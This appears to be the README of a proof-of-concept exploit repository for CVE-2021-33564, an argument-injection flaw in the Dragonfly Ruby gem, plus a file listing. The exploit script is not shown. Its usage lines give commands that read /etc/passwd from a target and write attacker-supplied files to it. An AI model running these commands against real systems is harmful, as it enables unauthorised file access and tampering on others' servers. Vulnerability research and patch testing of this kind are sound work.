Argument Injection in Dragonfly Ruby Gem exploit (backup)# CVE-2021-33564 PoC
Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem).
## Usage
### Arbitrary File Read
`python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd`
### Arbitrary File Write
`python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>`
For more information, please visit the blog.
[4.0K] /data/pocs/13ea4b32be1faffadff62baa914c2e795446e665
├── [2.2K] poc.py
├── [ 405] README.md
└── [ 18] requirements.txt
0 directories, 3 files